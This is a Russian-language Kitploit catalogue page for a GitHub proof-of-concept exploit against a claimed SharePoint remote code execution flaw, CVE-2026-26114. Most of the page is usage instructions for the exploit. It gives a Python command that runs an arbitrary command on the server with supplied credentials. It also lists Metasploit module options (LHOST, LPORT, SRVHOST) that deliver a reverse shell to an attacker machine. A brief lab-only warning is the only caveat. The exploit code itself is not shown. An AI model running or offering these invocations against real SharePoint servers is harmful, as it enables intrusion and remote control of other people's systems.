Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-26114-poc — Эксплойт proof-of-concept для CVE-2026-26114, уязвимости удалённого выполнения кода в Microsoft SharePoint, с PoC на Python и модулем Metasploit для автоматизированной эксплуатации и доставки reverse shell. | Kitploit
Инструменты/GitHubGitHub/huynambka/cve-2026-26114-poc
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHub
huynambka/cve-2026-26114-poc

cve-2026-26114-poc

Эксплойт proof-of-concept для CVE-2026-26114, уязвимости удалённого выполнения кода в Microsoft SharePoint, с PoC на Python и модулем Metasploit для автоматизированной эксплуатации и доставки reverse shell.

Репозиторий
23922 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-26114

Используйте только в лаборатории или в системах, где разрешено тестирование.

Python PoC

root@kitploit:~
pip install requests requests-ntlm

python poc/cve_2026_26114_rce.py ^
  --target http://sharepoint.local ^
  --username sp_user1 ^
  --password "Password123!" ^
  --domain SP19 ^
  --cmd "cmd /c whoami > C:\Windows\Temp\cve_2026_26114.txt"

Можно использовать --proxy http://127.0.0.1:8080, --insecure или заменить --cmd на --marker-file C:\Windows\Temp\marker.txt.

Модуль Metasploit

Модуль находится здесь:

root@kitploit:~
modules/exploits/windows/http/sharepoint_cve_2026_26114.rb

Пример опций:

root@kitploit:~
use exploit/windows/http/sharepoint_cve_2026_26114
set RHOSTS sharepoint.local
set RPORT 80
set SSL false
set TARGETURI /
set USERNAME sp_user1
set PASSWORD Password123!
set DOMAIN SP19
set SRVHOST 192.168.56.1
set SRVPORT 8080
set LHOST 192.168.56.1
set LPORT 4444
check
run

Если auto-discovery не используется, дополнительно задайте TAXONOMY_STORE_ID, TAXONOMY_GROUP_ID, SITE_ID, WEB_ID, JOB_CREATOR_ID.

Скачать инструмент